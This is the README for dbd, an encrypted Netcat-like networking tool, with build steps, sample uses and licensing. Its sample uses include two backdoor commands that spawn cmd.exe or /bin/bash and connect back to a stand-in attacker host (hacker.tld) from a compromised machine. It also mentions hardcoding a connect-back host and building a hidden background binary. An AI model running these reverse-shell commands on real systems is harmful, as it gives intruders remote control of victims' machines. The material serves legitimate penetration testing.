                          d8888b. d8888b. d8888b.
                          88  `8D 88  `8D 88  `8D
                          88   88 88oooY' 88   88
                          88   88 88~~~b. 88   88
                          88  .8D 88   8D 88  .8D
                          Y8888D' Y8888P' Y8888D'

    Copyright (C) 2012 Kyle Barnthouse <durandal@gitbrew.org>
                    dbd is distributed under the GNU GPL


SYNOPSIS
~~~~~~~~

dbd is a Netcat-clone, designed to be portable and offer strong encryption. It
runs on Unix-like operating systems and on Microsoft Win32. dbd features
AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution
(-e option), choosing source port, continuous reconnection with delay, and
some other nice features. dbd supports TCP/IP communication only. Source code
and binaries are distributed under the GNU General Public License.

COMPILATION
~~~~~~~~~~~

To compile dbd under a Unix-like operating system you need gcc and relevant
development tools. For Linux, FreeBSD, NetBSD, OpenBSD (and possibly others),
type:
    $ make unix

For SunOS/Solaris, type:
    $ make sunos

To compile dbd under Microsoft Windows (NT/2K/XP/2K3) you need MinGW+MSYS, or
Cygwin with full development support (Cygwin's MinGW gcc). To compile a native
Win32 dbd console application under Cygwin, type:

    $ make win32

    or, under MSYS:

    $ make mingw

To compile a no-console ("WinMain") application under Cygwin, type:

    $ make win32bg

    or, under MSYS:

    $ make mingwbg

To compile a Cygwin-specific console application, type:

    $ make cygwin


You may want to change the default behaviour of dbd. One of the most important
thing is to change the default shared secret to your own pass phrase. Edit
dbd.h and replace with your preferences. You may, for example, want to
hardcode a host + port to connect to if dbd is started without options.
Complete examples are provided in dbd.h.


SAMPLE USES
~~~~~~~~~~~

With a little imagination, dbd can be used for many things...

    * Use dbd to securely transfer files between two networks:

        snafu$ dbd -l -p 12345 -k secret > output.file

        fubar$ cat input.file | dbd -k secret snafu 12345

        or from win32:
        C:\somedir>type input.fil | dbd -k secret snafu 12345

    * Use dbd as a simple (but secure) chat:

        snafu$ dbd -P snafu -Hon fubar 1234

        fubar$ dbd -Pfubar -Hon -l -p 1234

    * Use dbd as a pen-test backdoor:

        C:\hacked box>dbdbg.exe -r1800 -q -e cmd.exe hacker.tld 443
        ...

        or under Unix-like OSes:

        root@owned# ./dbd -r1800 -Don -e /bin/bash hacker.tld 993

WARNING
~~~~~~~

Do not pass cached input (a file with commands or similar) to a listening "dbd
-e" session. "dbd -e" is using pipes to pass data between the program being
executed and dbd. Pipes are used (instead of plain pass-through duplicate file
descriptors) because of encryption between the pipes and the socket. In order
to prevent the writing end of one of the pipes from blocking the whole
process, I turned it into a non-blocking descriptor. There is a chance that
when passing too much input at a time through to the -e program, it will be
truncated (cut off) since the pipe buffer (in the OS) can't hold all of the
data. This problem can be solved by making dbd multi-threaded for instance,
but I'll avoid this as long as possible for compatibility reasons.


LICENSE
~~~~~~~

dbd Copyright (C) 2012 Kyle Barnthouse <durandal@gitbrew.org>

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation; either version 2 of the License, or (at your option) any later
version.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
details.

You should have received a copy of the GNU General Public License along with
this program; if not, write to the Free Software Foundation, Inc., 59 Temple
Place, Suite 330, Boston, MA  02111-1307  USA

See the COPYING file for more information.

--

dbd's AES-CBC-128 + HMAC-SHA1 implementation is Copyright (C) Christophe
Devine <devine@cr0.net> and is distributed under the GNU General Public
License (GPL).

Some code (for doexec_win32.h) has been derived from doexec.c from the Win32
port of Netcat (C) Weld Pond and *hobbit*. Parts of doexec.c is Copyright (C)
1994 Nathaniel W. Mishkin (doexec.c code was originally derived from
rlogind.exe).

The original version of Netcat was written by *hobbit* <hobbit@avian.org>. The
NT version was done by Weld Pond <weld@l0pht.com>.

--
Michel Blomgren <michel.blomgren@tigerteam.se>
Information Security Consultant
tigerteam.se

